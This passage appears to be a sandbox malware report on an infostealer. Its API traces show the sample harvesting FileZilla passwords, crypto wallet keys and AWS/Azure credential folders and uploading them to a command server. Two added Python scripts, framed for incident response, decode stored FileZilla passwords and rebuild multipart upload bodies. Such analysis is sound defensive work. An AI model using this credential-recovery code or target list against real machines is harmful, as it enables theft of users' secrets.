                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                  • Instruction ID: e02f94f4cd62e8d247d6becdca8e8f73443dbfe6dff9fadc7c7cbc5e50928459
                                  • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                  • Instruction Fuzzy Hash: 3D516B62E09BD985C7058B7944502EEBFB26FE6200F1E829DC8985B382D2355689C3E5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                                  • Instruction ID: 4d4380f719737e920eca18c290049424b63e8615d1407fedd07d3ef3da97591e
                                  • Opcode Fuzzy Hash: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                                  • Instruction Fuzzy Hash: E5D0C9716097114FC3688F1EB440946FAE8DBD8320715C53FA09AC3750C6B094418B54
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                  APIs
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                    • Part of subcall function 007F8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007F8F9B
                                    • Part of subcall function 007FAC30: lstrcpy.KERNEL32(00000000,?), ref: 007FAC82
                                    • Part of subcall function 007FAC30: lstrcat.KERNEL32(00000000), ref: 007FAC92
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                    • Part of subcall function 007FACC0: lstrlen.KERNEL32(?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007FACD5
                                    • Part of subcall function 007FACC0: lstrcpy.KERNEL32(00000000), ref: 007FAD14
                                    • Part of subcall function 007FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007FAD22
                                    • Part of subcall function 007FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007FAAF6
                                    • Part of subcall function 007EA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007EA13C
                                    • Part of subcall function 007EA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 007EA161
                                    • Part of subcall function 007EA110: LocalAlloc.KERNEL32(00000040,?), ref: 007EA181
                                    • Part of subcall function 007EA110: ReadFile.KERNEL32(000000FF,?,00000000,007E148F,00000000), ref: 007EA1AA
                                    • Part of subcall function 007EA110: LocalFree.KERNEL32(007E148F), ref: 007EA1E0
                                    • Part of subcall function 007EA110: CloseHandle.KERNEL32(000000FF), ref: 007EA1EA
                                    • Part of subcall function 007F8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 007F8FE2
                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00800DBF,00800DBE,00800DBB,00800DBA), ref: 007F04C2
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007F04C9
                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 007F04E5
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00800DB7), ref: 007F04F3
                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 007F052F
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00800DB7), ref: 007F053D
                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 007F0579
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00800DB7), ref: 007F0587
                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 007F05C3
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00800DB7), ref: 007F05D5
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00800DB7), ref: 007F0662
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00800DB7), ref: 007F067A
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00800DB7), ref: 007F0692
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00800DB7), ref: 007F06AA
                                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 007F06C2
                                  • lstrcat.KERNEL32(?,profile: null), ref: 007F06D1
                                  • lstrcat.KERNEL32(?,url: ), ref: 007F06E0
                                  • lstrcat.KERNEL32(?,00000000), ref: 007F06F3
                                  • lstrcat.KERNEL32(?,00801770), ref: 007F0702
                                  • lstrcat.KERNEL32(?,00000000), ref: 007F0715
                                  • lstrcat.KERNEL32(?,00801774), ref: 007F0724
                                  • lstrcat.KERNEL32(?,login: ), ref: 007F0733
                                  • lstrcat.KERNEL32(?,00000000), ref: 007F0746
                                  • lstrcat.KERNEL32(?,00801780), ref: 007F0755
                                  • lstrcat.KERNEL32(?,password: ), ref: 007F0764
                                  • lstrcat.KERNEL32(?,00000000), ref: 007F0777
                                  • lstrcat.KERNEL32(?,00801790), ref: 007F0786
                                  • lstrcat.KERNEL32(?,00801794), ref: 007F0795
                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00800DB7), ref: 007F07EE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 1942843190-555421843
                                  • Opcode ID: c25e913999fbe8895b5cbe253f740cd9a291dda8f67cb9b97b9cc7f0ee89206a
                                  • Instruction ID: c9f54f369e3731dd98e92491aee20a4f6f1dfbe232bb0e6258baca8c1a7c0974
                                  • Opcode Fuzzy Hash: c25e913999fbe8895b5cbe253f740cd9a291dda8f67cb9b97b9cc7f0ee89206a
                                  • Instruction Fuzzy Hash: BBD102B191020CEBCF04EBE4DD5AEFD7739AF54300F408654F216B62A6DB78AA45CB61
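The function above is the sample's FileZilla harvester: it resolves `\AppData\Roaming\FileZilla\recentservers.xml` under the SHGetFolderPathA result, reads the whole file into a heap buffer, scans it with StrStrA for the literal tokens `<Host>`, `<Port>`, `<User>` and `<Pass encoding="base64">`, and concatenates a record beginning `browser: FileZilla` / `profile: null` / `url: ` / `login: ` / `password: `. FileZilla writes the password base64-encoded, not encrypted, so any process that can read the file recovers it. The script below is an added example for this report (not code from the sample, from Joe Sandbox or from FileZilla): it parses the same file properly, decodes the password, and lays each entry out in the sample's field order so a responder can list which FTP/SFTP credentials to rotate and match them against a recovered upload. The XML is a constructed sample in FileZilla 3's on-disk layout; the separators between the url, host and port fields (the constants at 00801770, 00801774 and so on are not shown in the report) are assumed to be `:` and newlines.

```python
"""Parse FileZilla's recentservers.xml / sitemanager.xml after a Stealc
infection and render each entry in the record layout the sample builds.

Added example for this report, not code from the sample or from Joe Sandbox.
Assumption: the separator constants the sample concatenates between fields are
not visible in the report; ':' between host and port and '\n' between lines
are assumed here.
"""
import base64
import xml.etree.ElementTree as ET

# Constructed sample in FileZilla 3's on-disk format (not taken from the report).
SAMPLE_RECENTSERVERS_XML = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.66.4" platform="windows">
  <RecentServers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>deploy</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
      <Logontype>1</Logontype>
    </Server>
    <Server>
      <Host>sftp.example.test</Host>
      <Port>2222</Port>
      <Protocol>1</Protocol>
      <User>backup</User>
      <Logontype>0</Logontype>
    </Server>
  </RecentServers>
</FileZilla3>
"""


def parse_filezilla_servers(xml_text: str) -> list[dict]:
    """Return one dict per <Server> with host, port, user and the decoded password.

    FileZilla stores the password base64-encoded (not encrypted) in
    <Pass encoding="base64">, which is why the sample's StrStrA/lstrcpy loop
    needs no decryption step at all.
    """
    root = ET.fromstring(xml_text)
    records = []
    for server in root.iter("Server"):
        host = server.findtext("Host", default="")
        port = server.findtext("Port", default="")
        user = server.findtext("User", default="")
        pass_el = server.find("Pass")
        password = None  # anonymous / key-based entries carry no <Pass> element
        if pass_el is not None and pass_el.text:
            if pass_el.get("encoding") == "base64":
                password = base64.b64decode(pass_el.text).decode("utf-8", "replace")
            else:
                password = pass_el.text  # older builds wrote <Pass> as plaintext
        records.append({"host": host, "port": port, "user": user, "password": password})
    return records


def render_stealer_record(rec: dict) -> str:
    """Lay the entry out in the field order of the sample's lstrcat chain.

    The separators are an assumption (see module docstring); the field labels
    are the literals listed in the report.
    """
    password = rec["password"] if rec["password"] is not None else ""
    return "\n".join([
        "browser: FileZilla",
        "profile: null",
        f"url: {rec['host']}:{rec['port']}",
        f"login: {rec['user']}",
        f"password: {password}",
    ])


def credentialed_entries(xml_text: str) -> list[dict]:
    """Only the entries whose password is recoverable from the file, i.e. the
    credentials that must be rotated once the host is known to be infected."""
    return [r for r in parse_filezilla_servers(xml_text) if r["password"]]


if __name__ == "__main__":
    for rec in credentialed_entries(SAMPLE_RECENTSERVERS_XML):
        print(render_stealer_record(rec))
        print("-" * 20)
```

Run it against `%APPDATA%\FileZilla\recentservers.xml` and `sitemanager.xml` from the affected user profile; the second entry in the constructed sample (a key-based logon with no `<Pass>`) is deliberately skipped by `credentialed_entries`, while the sample's substring scan would simply find no `<Pass encoding="base64">` token for it.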
                                  APIs
                                    • Part of subcall function 007FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007FAAF6
                                    • Part of subcall function 007E4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 007E4889
                                    • Part of subcall function 007E4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 007E4899
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 007E5A48
                                  • StrCmpCA.SHLWAPI(?,0145E350), ref: 007E5A63
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 007E5BE3
                                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0145E250,00000000,?,01459E88,00000000,?,00801B4C), ref: 007E5EC1
                                  • lstrlen.KERNEL32(00000000), ref: 007E5ED2
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 007E5EE3
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007E5EEA
                                  • lstrlen.KERNEL32(00000000), ref: 007E5EFF
                                  • lstrlen.KERNEL32(00000000), ref: 007E5F28
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 007E5F41
                                  • lstrlen.KERNEL32(00000000,?,?), ref: 007E5F6B
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 007E5F7F
                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 007E5F9C
                                  • InternetCloseHandle.WININET(00000000), ref: 007E6000
                                  • InternetCloseHandle.WININET(00000000), ref: 007E600D
                                  • HttpOpenRequestA.WININET(00000000,0145E340,?,0145DB00,00000000,00000000,00400100,00000000), ref: 007E5C48
                                    • Part of subcall function 007FACC0: lstrlen.KERNEL32(?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007FACD5
                                    • Part of subcall function 007FACC0: lstrcpy.KERNEL32(00000000), ref: 007FAD14
                                    • Part of subcall function 007FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007FAD22
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                    • Part of subcall function 007FAC30: lstrcpy.KERNEL32(00000000,?), ref: 007FAC82
                                    • Part of subcall function 007FAC30: lstrcat.KERNEL32(00000000), ref: 007FAC92
                                  • InternetCloseHandle.WININET(00000000), ref: 007E6017
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 874700897-2180234286
                                  • Opcode ID: d54b40c9900a59a57100e8b9e7c333a6134f713d662581292233b7f1a7654ce1
                                  • Instruction ID: 521502f92d0a4d2bb9f1bd1411199bba3602d46c77a3eb1e9f1320236dbafbb4
                                  • Opcode Fuzzy Hash: d54b40c9900a59a57100e8b9e7c333a6134f713d662581292233b7f1a7654ce1
                                  • Instruction Fuzzy Hash: 7312CFB192011CFBCB15EBA4DCA9FFEB379BF54700F004199B20A62291DF746A49CB65
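The function above is the sample's upload routine: InternetOpenA with access type 1 (INTERNET_OPEN_TYPE_DIRECT), InternetCrackUrlA on the C2 URL, InternetConnectA with service type 3 (INTERNET_SERVICE_HTTP), HttpOpenRequestA with flags 0x00400100 (INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_PRAGMA_NOCACHE), a run of lstrlen/lstrcat into a heap buffer, HttpSendRequestA and InternetReadFile. The `"` and `------` literals it concatenates are consistent with a multipart/form-data body assembled by hand, with a dash-prefixed boundary and quoted `name="..."` / `filename="..."` parameters. The code below is an added example for this report (not code from the sample, from Joe Sandbox or from any Stealc writeup): it builds such a body and parses one back, so an analyst can pull the individual fields out of a POST captured by the IDS. The full boundary value, the field names and the exact line layout are not visible in the report and are assumed here; the sample input is constructed.

```python
"""Build and parse a hand-rolled multipart/form-data body of the kind a
WinINet-based stealer assembles with lstrcat before HttpSendRequestA.

Added example for this report, not code from the sample, from Joe Sandbox or
from any Stealc writeup. Assumed (not visible in the report): the full boundary
value, the field names and the exact line layout; the report only shows the
'------' and '"' literals the sample concatenates.
"""
import re

CRLF = b"\r\n"

# Content-Disposition parameters: name="..." and an optional filename="...".
_DISPOSITION = re.compile(rb'name="([^"]*)"(?:;\s*filename="([^"]*)")?')


def build_multipart(fields: dict, boundary: str) -> tuple:
    """Return (body, content_type).

    A value that is a (filename, bytes) tuple becomes a file part; any other
    bytes value becomes a plain form field. The boundary is the caller's
    choice; the sample's '------' literal suggests a dash-prefixed one.
    """
    delim = b"--" + boundary.encode()
    parts = []
    for name, value in fields.items():
        parts.append(delim + CRLF)
        if isinstance(value, tuple):
            filename, data = value
            disposition = f'Content-Disposition: form-data; name="{name}"; filename="{filename}"'
            parts.append(disposition.encode() + CRLF)
            parts.append(b"Content-Type: application/octet-stream" + CRLF + CRLF)
            parts.append(data + CRLF)
        else:
            disposition = f'Content-Disposition: form-data; name="{name}"'
            parts.append(disposition.encode() + CRLF + CRLF)
            parts.append(value + CRLF)
    parts.append(delim + b"--" + CRLF)  # closing delimiter
    return b"".join(parts), f"multipart/form-data; boundary={boundary}"


def boundary_from_body(body: bytes) -> str:
    """Recover the boundary when only the body was captured: the first line
    of a well-formed body is '--' followed by the boundary."""
    first_line, _, _ = body.partition(CRLF)
    if not first_line.startswith(b"--"):
        raise ValueError("body does not start with a multipart delimiter")
    return first_line[2:].decode()


def parse_multipart(body: bytes, boundary: str) -> list[dict]:
    """Split a captured body on its boundary and return the parts as dicts
    with 'name', 'filename' (None for plain fields) and raw 'data'.

    Caveat: a part whose data itself contains '--' + boundary would be split
    in two; real boundaries are chosen long enough that this does not happen.
    """
    delim = b"--" + boundary.encode()
    parts = []
    for chunk in body.split(delim)[1:]:  # drop the preamble before the first delimiter
        if chunk.startswith(b"--"):      # reached the closing '--boundary--'
            break
        chunk = chunk[len(CRLF):]        # strip the CRLF that follows the delimiter
        header_blob, _, content = chunk.partition(CRLF + CRLF)
        if content.endswith(CRLF):       # the CRLF before the next delimiter is not data
            content = content[:-len(CRLF)]
        m = _DISPOSITION.search(header_blob)
        if not m:
            continue
        parts.append({
            "name": m.group(1).decode(),
            "filename": m.group(2).decode() if m.group(2) else None,
            "data": content,
        })
    return parts


if __name__ == "__main__":
    # Constructed request: hypothetical field names, not taken from the report.
    body, ctype = build_multipart(
        {"token": b"abc123", "file": ("report.txt", b"browser: FileZilla\r\nprofile: null")},
        "------ExampleBoundary",
    )
    print(ctype)
    for part in parse_multipart(body, boundary_from_body(body)):
        print(part["name"], part["filename"], part["data"])
```

When working from a PCAP, take the POST body after the blank line that ends the HTTP headers, feed it to `boundary_from_body` if the Content-Type header was not captured, and iterate over `parse_multipart`; each file part's `data` is the raw blob the sample uploaded.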
                                  APIs
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                    • Part of subcall function 007FACC0: lstrlen.KERNEL32(?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007FACD5
                                    • Part of subcall function 007FACC0: lstrcpy.KERNEL32(00000000), ref: 007FAD14
                                    • Part of subcall function 007FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007FAD22
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                    • Part of subcall function 007F8CF0: GetSystemTime.KERNEL32(00800E1B,01459D08,008005B6,?,?,007E13F9,?,0000001A,00800E1B,00000000,?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007F8D16
                                    • Part of subcall function 007FAC30: lstrcpy.KERNEL32(00000000,?), ref: 007FAC82
                                    • Part of subcall function 007FAC30: lstrcat.KERNEL32(00000000), ref: 007FAC92
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 007ED083
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 007ED1C7
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007ED1CE
                                  • lstrcat.KERNEL32(?,00000000), ref: 007ED308
                                  • lstrcat.KERNEL32(?,00801570), ref: 007ED317
                                  • lstrcat.KERNEL32(?,00000000), ref: 007ED32A
                                  • lstrcat.KERNEL32(?,00801574), ref: 007ED339
                                  • lstrcat.KERNEL32(?,00000000), ref: 007ED34C
                                  • lstrcat.KERNEL32(?,00801578), ref: 007ED35B
                                  • lstrcat.KERNEL32(?,00000000), ref: 007ED36E
                                  • lstrcat.KERNEL32(?,0080157C), ref: 007ED37D
                                  • lstrcat.KERNEL32(?,00000000), ref: 007ED390
                                  • lstrcat.KERNEL32(?,00801580), ref: 007ED39F
                                  • lstrcat.KERNEL32(?,00000000), ref: 007ED3B2
                                  • lstrcat.KERNEL32(?,00801584), ref: 007ED3C1
                                  • lstrcat.KERNEL32(?,00000000), ref: 007ED3D4
                                  • lstrcat.KERNEL32(?,00801588), ref: 007ED3E3
                                    • Part of subcall function 007FAB30: lstrlen.KERNEL32(007E4F55,?,?,007E4F55,00800DDF), ref: 007FAB3B
                                    • Part of subcall function 007FAB30: lstrcpy.KERNEL32(00800DDF,00000000), ref: 007FAB95
                                  • lstrlen.KERNEL32(?), ref: 007ED42A
                                  • lstrlen.KERNEL32(?), ref: 007ED439
                                    • Part of subcall function 007FAD80: StrCmpCA.SHLWAPI(00000000,00801568,007ED2A2,00801568,00000000), ref: 007FAD9F
                                  • DeleteFileA.KERNEL32(00000000), ref: 007ED4B4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                  • String ID:
                                  • API String ID: 1956182324-0
                                  • Opcode ID: ea5543f2591433b3c514a7cfe42e0f8763a63ee739f1f6a6b7bb80f749f05059
                                  • Instruction ID: 5dd79a5e7908412b16908096139b2336db58cd6b63aff6105d87051d13017fc2
                                  • Opcode Fuzzy Hash: ea5543f2591433b3c514a7cfe42e0f8763a63ee739f1f6a6b7bb80f749f05059
                                  • Instruction Fuzzy Hash: FEE116F1910108EBCB04EBE4DD9AEFE7339AF54301F104555F20A762A2DE79AE09CB65
                                  APIs
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                    • Part of subcall function 007FAC30: lstrcpy.KERNEL32(00000000,?), ref: 007FAC82
                                    • Part of subcall function 007FAC30: lstrcat.KERNEL32(00000000), ref: 007FAC92
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                    • Part of subcall function 007FACC0: lstrlen.KERNEL32(?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007FACD5
                                    • Part of subcall function 007FACC0: lstrcpy.KERNEL32(00000000), ref: 007FAD14
                                    • Part of subcall function 007FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007FAD22
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0145CE80,00000000,?,00801544,00000000,?,?), ref: 007ECB6C
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 007ECB89
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 007ECB95
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 007ECBA8
                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 007ECBD9
                                  • StrStrA.SHLWAPI(?,0145CF58,00800B56), ref: 007ECBF7
                                  • StrStrA.SHLWAPI(00000000,0145CFA0), ref: 007ECC1E
                                  • StrStrA.SHLWAPI(?,0145D6F8,00000000,?,00801550,00000000,?,00000000,00000000,?,014589B0,00000000,?,0080154C,00000000,?), ref: 007ECDA2
                                  • StrStrA.SHLWAPI(00000000,0145D698), ref: 007ECDB9
                                    • Part of subcall function 007EC920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 007EC971
                                    • Part of subcall function 007EC920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 007EC97C
                                  • StrStrA.SHLWAPI(?,0145D698,00000000,?,00801554,00000000,?,00000000,01458890), ref: 007ECE5A
                                  • StrStrA.SHLWAPI(00000000,01458B00), ref: 007ECE71
                                    • Part of subcall function 007EC920: lstrcat.KERNEL32(?,00800B47), ref: 007ECA43
                                    • Part of subcall function 007EC920: lstrcat.KERNEL32(?,00800B4B), ref: 007ECA57
                                    • Part of subcall function 007EC920: lstrcat.KERNEL32(?,00800B4E), ref: 007ECA78
                                  • lstrlen.KERNEL32(00000000), ref: 007ECF44
                                  • CloseHandle.KERNEL32(00000000), ref: 007ECF9C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                  • String ID:
                                  • API String ID: 3744635739-3916222277
                                  • Opcode ID: 5f29e6985884edad5885965964d67be9ee1a8d94fd9c27c52055be56c249a71c
                                  • Instruction ID: 97da28a06bfbec6d9c4086d958bd25a7213fbe6d9685491bbc08759ce3d7b364
                                  • Opcode Fuzzy Hash: 5f29e6985884edad5885965964d67be9ee1a8d94fd9c27c52055be56c249a71c
                                  • Instruction Fuzzy Hash: C9E1BEB191010CFBCB15EBA4DCA5FFEB779AF54300F004159F20A662A2DF786A49CB65
                                  APIs
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                  • RegOpenKeyExA.ADVAPI32(00000000,0145AA40,00000000,00020019,00000000,008005BE), ref: 007F8534
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 007F85B6
                                  • wsprintfA.USER32 ref: 007F85E9
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 007F860B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 007F861C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 007F8629
                                    • Part of subcall function 007FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007FAAF6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                                  • String ID: - $%s\%s$?
                                  • API String ID: 3246050789-3278919252
                                  • Opcode ID: cd84637b8b9df5f3980849a490f75603d7a645e567063678236d635e00b2b933
                                  • Instruction ID: 32cb0ed36d02f0e277933ee516c817206f56612bac8151f3fc2f75c882329465
                                  • Opcode Fuzzy Hash: cd84637b8b9df5f3980849a490f75603d7a645e567063678236d635e00b2b933
                                  • Instruction Fuzzy Hash: F2812EB191011CEBDB64DB94CD95FEA77B8BF48300F1082D8E209A6291DF746B85CFA1
                                  APIs
                                    • Part of subcall function 007F8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007F8F9B
                                  • lstrcat.KERNEL32(?,00000000), ref: 007F5000
                                  • lstrcat.KERNEL32(?,\.azure\), ref: 007F501D
                                    • Part of subcall function 007F4B60: wsprintfA.USER32 ref: 007F4B7C
                                    • Part of subcall function 007F4B60: FindFirstFileA.KERNEL32(?,?), ref: 007F4B93
                                  • lstrcat.KERNEL32(?,00000000), ref: 007F508C
                                  • lstrcat.KERNEL32(?,\.aws\), ref: 007F50A9
                                    • Part of subcall function 007F4B60: StrCmpCA.SHLWAPI(?,00800FC4), ref: 007F4BC1
                                    • Part of subcall function 007F4B60: StrCmpCA.SHLWAPI(?,00800FC8), ref: 007F4BD7
                                    • Part of subcall function 007F4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 007F4DCD
                                    • Part of subcall function 007F4B60: FindClose.KERNEL32(000000FF), ref: 007F4DE2
                                  • lstrcat.KERNEL32(?,00000000), ref: 007F5118
                                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 007F5135
                                    • Part of subcall function 007F4B60: wsprintfA.USER32 ref: 007F4C00
                                    • Part of subcall function 007F4B60: StrCmpCA.SHLWAPI(?,008008D3), ref: 007F4C15
                                    • Part of subcall function 007F4B60: wsprintfA.USER32 ref: 007F4C32
                                    • Part of subcall function 007F4B60: PathMatchSpecA.SHLWAPI(?,?), ref: 007F4C6E
                                    • Part of subcall function 007F4B60: lstrcat.KERNEL32(?,0145E300), ref: 007F4C9A
                                    • Part of subcall function 007F4B60: lstrcat.KERNEL32(?,00800FE0), ref: 007F4CAC
                                    • Part of subcall function 007F4B60: lstrcat.KERNEL32(?,?), ref: 007F4CC0
